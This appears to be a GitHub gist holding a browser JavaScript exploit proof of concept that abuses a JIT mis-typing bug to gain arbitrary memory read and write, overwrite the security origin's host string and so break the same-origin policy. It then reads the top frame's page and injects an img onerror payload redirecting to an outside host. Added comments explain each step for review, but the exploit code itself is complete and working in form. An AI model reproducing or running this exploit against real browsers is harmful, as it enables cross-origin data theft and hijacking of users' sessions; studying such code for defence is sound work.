@rootxharsh
Created March 6, 2022 16:12
<html>
<b>pwn</b>
</html>
<script>
/* Thanks to zer0pts ptr-yudai Discord log which helped me write this exploit :) */
/*
 * Float64 <-> BigUint64 reinterpretation helpers.
 *
 * One 8-byte buffer is shared by two typed views, so a value written
 * through one view can be read back bit-for-bit through the other.
 * Typed arrays use the host's byte order, so the result is platform
 * endianness (little-endian on the usual targets).
 */
const scratch = new ArrayBuffer(8);
const asFloat64 = new Float64Array(scratch);
const asUint64 = new BigUint64Array(scratch);

/** Format this BigInt as a 0x-prefixed, lowercase hexadecimal string. */
BigInt.prototype.hex = function () {
  return `0x${this.toString(16)}`;
};

/** Reinterpret the low 64 bits of this BigInt as an IEEE-754 double. */
BigInt.prototype.i2f = function () {
  asUint64[0] = this;
  return asFloat64[0];
};

/** Reinterpret this Number's IEEE-754 double bit pattern as a BigInt. */
Number.prototype.f2i = function () {
  asFloat64[0] = this;
  return asUint64[0];
};
/**
 * Allocation-pressure loop: creates 0x10000 throw-away ArrayBuffers and
 * drops them immediately, which makes a garbage-collection cycle likely.
 * Whether the engine actually collects is up to the engine; there is no
 * return value.
 */
function gc() {
  let remaining = 0x10000;
  while (remaining > 0) {
    void new ArrayBuffer();
    remaining -= 1;
  }
}
/*
 * Proof-of-concept entry point.
 *
 * Everything in here depends on exact statement order (JIT warm-up, an
 * allocation loop to provoke GC, then one call with the bug-triggering
 * argument) and on heap-layout constants that this page does not explain,
 * so the body is left untouched and only annotated.
 *
 * Observable effects, in order: console lines prefixed "[+]", a change of
 * window.origin mid-page, and an attempt to read and replace
 * top.document.body.innerHTML. The last two are the defender-relevant
 * signals: an origin string that changes while the page is alive, and a
 * write into the top frame's document from what is presumably a
 * cross-origin frame (the try/catch expects the access to be denied).
 * In an engine without the underlying bug, `new Array(-1)` inside jitme
 * throws a RangeError and nothing below the warm-up runs.
 */
function pwn()
{
// ArrayBuffer subclass with one extra inline property. `slot` is later
// overwritten with an object reference (see addrof) and the stored value
// is read back through rwarr[9]; that index is a layout assumption.
class LeakArrayBuffer extends ArrayBuffer {
constructor(size) {
super(size);
this.slot = 0xb33f;
}
}
// Called 0x10000 times with a=false so the optimizing JIT compiles it,
// then once with a=true. With a=true, x = 0xFFFFFFFF, so the length
// expression is Math.sign(0 - 0xFFFFFFFF) = -1 and a correct engine throws
// a RangeError here; the PoC relies on the optimized code mis-typing this
// expression (the specific engine bug is not identified on this page).
// local_arr and buff are allocated right after arr so that the later
// out-of-bounds write through arr lands in them -- adjacency is assumed,
// never verified.
function jitme(a) {
var x = -1;
if (a) x = 0xFFFFFFFF;
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
arr.shift();
var local_arr = Array(2);
local_arr[0] = 5.1;
var buff = new LeakArrayBuffer(0x1000);
arr[0] = 0x1122;
return [arr, local_arr, buff];
}
/* Cause bug */
gc();
console.log("[+] START");
console.log("[+] window.origin now " + window.origin);
// Warm-up: the a=false path never hits the bad length.
for (var i = 0; i < 0x10000; ++i)
jitme(false);
gc();
// No declaration: in sloppy mode these three become implicit globals,
// which is also why `delete corrput_arr` below actually removes a binding.
[corrput_arr, rwarr, corrupt_buff] = jitme(true);
// Out-of-bounds write through the mis-sized array; index and value are
// layout-specific and unexplained here. The intent, inferred from the
// primitives that follow, is to enlarge the neighbouring rwarr.
corrput_arr[12] = 0x22444;
delete corrput_arr;
/* Primitives */
// Patches the two doubles at rwarr[4] and rwarr[5], which the PoC assumes
// overlap corrupt_buff's backing-store pointer (straddling the two slots).
// NOTE(review): the parameter names are inverted relative to every caller:
// aar64/aaw64/aaw32/aaw8 all pass the HIGH 32 bits as `l` and the LOW 32
// bits as `h`. Read this as: upper half of rwarr[4] <- low dword,
// lower half of rwarr[5] <- high dword.
function set_backing_store(l, h) {
rwarr[4] = ((h << 32n) | (rwarr[4].f2i() & 0xffffffffn)).i2f();
rwarr[5] = ((rwarr[5].f2i() & 0xffffffff00000000n) | l).i2f();
}
// Address-of primitive: store o in the inline slot, read the slot's raw
// bits back through the overlapping rwarr element. Returns only the low
// 32 bits; the -1 presumably strips a pointer tag bit -- not verifiable
// from this page.
function addrof(o) {
corrupt_buff.slot = o;
return (rwarr[9].f2i() - 1n) & 0xffffffffn;
}
// Every read/write below goes through this view, i.e. wherever the
// (patched) backing-store pointer of corrupt_buff currently points.
var corrupt_view = new DataView(corrupt_buff);
var corrupt_buffer_ptr_low = addrof(corrupt_buff);
console.log("[+] leak = " + corrupt_buffer_ptr_low.hex());
/* Fake obj */
// Recover the upper 32 bits of the address space: pick an rwarr index
// whose element the PoC assumes holds a full 64-bit pointer. The 0x40000
// alignment and the +0x1c are heap-layout assumptions. The two branches
// handle that pointer being 8-byte aligned or sitting 4 bytes into a slot.
var idx0Addr = corrupt_buffer_ptr_low - 0x10n;
var baseAddr = (corrupt_buffer_ptr_low & 0xffff0000n) - ((corrupt_buffer_ptr_low & 0xffff0000n) % 0x40000n) + 0x40000n;
var delta = baseAddr + 0x1cn - idx0Addr;
var addr_upper;
if ((delta % 8n) == 0n) {
var baseIdx = delta / 8n;
addr_upper = (rwarr[baseIdx].f2i() & 0xffffffffn) << 32n;
} else {
var baseIdx = ((delta - (delta % 8n)) / 8n);
addr_upper = rwarr[baseIdx].f2i() & 0xffffffff00000000n;
}
console.log("[+] upper = " + addr_upper.hex());
// Arbitrary 64-bit read: repoint the backing store at addr, read 8 bytes.
function aar64(addr) {
set_backing_store(addr >> 32n, addr & 0xffffffffn);
return corrupt_view.getFloat64(0, true).f2i();
}
// Arbitrary 64-bit write (value is a BigInt).
function aaw64(addr, value) {
set_backing_store(addr >> 32n, addr & 0xffffffffn);
corrupt_view.setFloat64(0, value.i2f(), true);
}
// Arbitrary 32-bit write (value is a Number).
function aaw32(addr, value) {
set_backing_store(addr >> 32n, addr & 0xffffffffn);
corrupt_view.setInt32(0, value, true);
}
// Arbitrary 8-bit write. Unused on this page.
function aaw8(addr, value) {
set_backing_store(addr >> 32n, addr & 0xffffffffn);
corrupt_view.setInt8(0, value , true);
}
// `+` binds tighter than `|`: this is addr_upper | (addrof(window) + 0x18n).
var addr_window = addr_upper | addrof(window) + 0x18n;
console.log("[+] window = " + addr_window.hex());
// Pointer walk from the window object to the string the PoC treats as the
// origin's host. Every offset here is specific to one browser build; the
// page does not say which, so none of them can be checked from here.
var addr_ldomwin = aar64(addr_window) + 0x80n;
console.log("[+] LoclDOMWindow = " + addr_ldomwin.hex());
var get_sec_origin = aar64(addr_ldomwin + 0x110n);
console.log("[+] sec_origin_context " + get_sec_origin.hex());
var addr_sec = aar64(get_sec_origin + 0x110n + 0x10n);
console.log("[+] security_context = " + addr_sec.hex())
//var port = aar64(addr_sec+0x20n); // you can spoof the port which is at +0x20 from sec
//console.log("[+] port = " + port.hex())
var sec_host = aar64(addr_sec+0x18n);
console.log("[+] host String = " + sec_host.hex())
// Overwrite the first four bytes of the host string in place; 0x656d6f73
// little-endian is the ASCII text "some". The next console line shows
// the resulting window.origin, which is the simplest observable symptom.
aaw32(sec_host, 0x656d6f73) //p32(0x656d6f73) = some
console.log("[+] window.origin after exp = "+window.origin)
// With the same-origin policy intact this access throws a SecurityError
// and only "sed lyf" is logged.
try{
console.log("[+] Accessing top.document.body.innerHTML ")
console.log(top.document.body.innerHTML);
top.document.body.innerHTML = '<img src=x onerror="location=`http://mws.rce.ee/`">'
}
catch(e){
console.log("sed lyf")
}
}
pwn()
</script>